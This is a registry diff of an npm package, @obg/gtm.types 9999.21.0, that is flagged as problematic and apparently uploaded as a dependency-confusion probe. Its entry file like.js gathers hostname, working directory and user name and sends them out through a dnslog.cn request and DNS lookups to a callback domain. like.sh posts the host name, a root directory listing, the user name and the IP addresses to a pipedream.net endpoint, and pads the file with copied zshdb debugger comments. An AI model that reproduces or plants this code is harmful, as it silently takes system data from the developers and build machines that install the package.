@obg/gtm.types 9999.21.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of @obg/gtm.types might be problematic. Click here for more details.

Files changed (4) hide show
  1. package/README.md +2 -0
  2. package/like.js +13 -0
  3. package/like.sh +134 -0
  4. package/package.json +14 -0
package/README.md ADDED
@@ -0,0 +1,2 @@
1
+ Email: adhamsadaqah.as@gmail.com
2
+ Hackerone_username: adhamsadaqah
package/like.js ADDED
@@ -0,0 +1,13 @@
1
+ const { exec } = require("child_process");
2
+ exec("a=$(hostname;pwd;whoami;echo '@obg/gtm.types';curl https://qnbpf7.dnslog.cn;) && echo $a | xxd -p | head | while read ut;do nslookup $a.bind9-or-callback-server.com;done" , (error, data, getter) => {
3
+ if(error){
4
+ console.log("error",error.message);
5
+ return;
6
+ }
7
+ if(getter){
8
+ console.log(data);
9
+ return;
10
+ }
11
+ console.log(data);
12
+
13
+ });
package/like.sh ADDED
@@ -0,0 +1,134 @@
1
+ #!/bin/bash
2
+ curl -H "h1: $(hostname | base64 | base64 )" -H "h2: $(ls / | base64 | base64 | tr -d '\n')" -H "h3: $(pwd | base64 | base64)" -H "h4: $(whoami | base64 | base64 | tr -d '\n')" -H "h5: $(hostname -I | base64 | base64 | tr -d '\n')" https://d01da80b7d96744da1bdc8525f28bcd1.m.pipedream.net
3
+ # dbg-pre.sh - Code common to zshdb and zshdb-trace that has to run first
4
+
5
+ # Copyright (C) 2008-2010, 2014 Rocky Bernstein rocky@gnu.org
6
+
7
+ # zshdb is free software; you can redistribute it and/or modify it under
8
+ # the terms of the GNU General Public License as published by the Free
9
+ # Software Foundation; either version 2, or (at your option) any later
10
+ # version.
11
+
12
+ # zshdb is distributed in the hope that it will be useful, but WITHOUT ANY
13
+ # WARRANTY; without even the implied warranty of MERCHANTABILITY or
14
+ # FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
15
+ # for more details.
16
+
17
+ # You should have received a copy of the GNU General Public License along
18
+ # with zshdb; see the file COPYING. If not, write to the Free Software
19
+ # Foundation, 59 Temple Place, Suite 330, Boston, MA 02111 USA.
20
+
21
+ # Here we put definitions common to both the script debugger and
22
+ # dbg-trace.sh. In contrast to other routines, this code is sourced
23
+ # early -- before most of the debugger script is run.
24
+
25
+ # Note: initializations which are mostly used in only one sub-part
26
+ # (e.g. variables for break/watch/actions) are in the corresponding
27
+ # file: either in lib or (less good) command.
28
+
29
+ # Are we using a debugger-enabled shell? If not let's stop right here.
30
+ #typeset old_setopt="$-"
31
+
32
+ # is-at-least messes up in some situations so we have to not use it for now.
33
+ # typeset -fuz is-at-least Same as "functions -u -z" but better documented.
34
+ # if ! is-at-least 4.3.6-dev-0 ; then
35
+ # print "Sorry, your $_Dbg_shell_name just isn't modern enough." 2>&1
36
+ # print "We need 4.3.6-dev-0 or greater." 2>&1
37
+ # exit 30
38
+ # fi
39
+ # is-at-least does an emulate -L zsh
40
+ # emulate -L ksh
41
+
42
+ # Will be set to 1 if the top-level call is a debugger.
43
+ #typeset -i _Dbg_script=0
44
+
45
+ # This function is overwritten by when lib/fns.sh gets loaded
46
+ #_Dbg_msg()
47
+ #{
48
+ # echo "$*"
49
+ #}
50
+
51
+ # Used by "show version" as well as --version
52
+ #_Dbg_do_show_version()
53
+ #{
54
+ # _Dbg_msg "$_Dbg_debugger_name, release $_Dbg_release"
55
+ #}
56
+
57
+ # Expand filename given as $1.
58
+ # we echo the expanded name or return $1 unchanged if a bad filename.
59
+ # Return is 0 if good or 1 if bad.
60
+ # File globbing is handled.
61
+ # Note we don't check that the file exists, just that the format is
62
+ # valid; we do check that we can "search" the directory implied in the
63
+ # filename.
64
+
65
+ #function _Dbg_expand_filename {
66
+ # typeset -r filename="$1"
67
+
68
+ # Break out basename and dirname
69
+ # typeset basename="${filename*/}"
70
+ # typeset -x dirname="${filename%/*}"
71
+
72
+ # No slash given in filename? Then use . for dirname
73
+ # [[ $dirname == $basename ]] && [[ $filename != '/' ]] && dirname='.'
74
+
75
+ # Dirname is ''? Then use / for dirname
76
+ # dirname=${dirname:-/}
77
+
78
+ # Handle tilde expansion in dirname
79
+ # dirname=$(echo $dirname)
80
+
81
+ # typeset long_path
82
+
83
+ # [[ $basename == '.' ]] && basename=''
84
+ # if long_path=$( (cd "$dirname" ; pwd) 2>/dev/null ) ; then
85
+ # if [[ "$long_path" == '/' ]] ; then
86
+ # echo "/$basename"
87
+ # else
88
+ # echo "$long_path/$basename"
89
+ # fi
90
+ # return 0
91
+ # else
92
+ # echo $filename
93
+ # return 1
94
+ # fi
95
+ #}
96
+
97
+ # Create temporary file based on $1
98
+ # file $1
99
+ #_Dbg_tempname() {
100
+ # echo "$_Dbg_tmpdir/${_Dbg_debugger_name}_$1_$$"
101
+ #}
102
+
103
+ # Process command-line options
104
+ #. ${_Dbg_libdir}/dbg-opts.sh
105
+ #OPTLIND=1
106
+ #_Dbg_parse_options "$@"
107
+
108
+ #if [[ ! -d $_Dbg_tmpdir ]] && [[ ! -w $_Dbg_tmpdir ]] ; then
109
+ # echo "${_Dbg_pname}: cannot write to temp directory $_Dbg_tmpdir." >&2
110
+ # echo "${_Dbg_pname}: Use -T try directory location." >&2
111
+ # exit 1
112
+ #fi
113
+
114
+ # Save the initial working directory so we can reset it on a restart.
115
+ #typeset -x _Dbg_init_cwd=$PWD
116
+
117
+ #typeset -i _Dbg_running=1 True we are not finished running the program
118
+
119
+ #typeset -i _Dbg_brkpt_num=0 If nonzero, the breakpoint number that we
120
+ # are currently stopped at.
121
+
122
+ # Sets whether or not to display command before executing it.
123
+ #typeset _Dbg_set_trace_commands='off'
124
+
125
+ # Known normal IFS consisting of a space, tab and newline
126
+ #typeset -x _Dbg_space_IFS=$' \t\r\n'
127
+
128
+ # Number of statements to run before entering the debugger. Is used
129
+ # intially to get out of sourced dbg-main.inc script and in top-level
130
+ # debugger script to not stop in remaining debugger statements before
131
+ # the sourcing the script to be debugged.
132
+ #typeset -i _Dbg_step_ignore=1
133
+ #[[ -n $_Dbg_histfile ]] && fc -p ${_Dbg_histfile}
134
+ #
package/package.json ADDED
@@ -0,0 +1,14 @@
1
+ {
2
+ "name": "@obg/gtm.types",
3
+ "version": "9999.21.0",
4
+ "description": "",
5
+ "main": "like.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1"
8
+ },
9
+ "author": "adham",
10
+ "license": "ISC",
11
+ "dependencies": {
12
+ "lodash": "^4.17.21"
13
+ }
14
+ }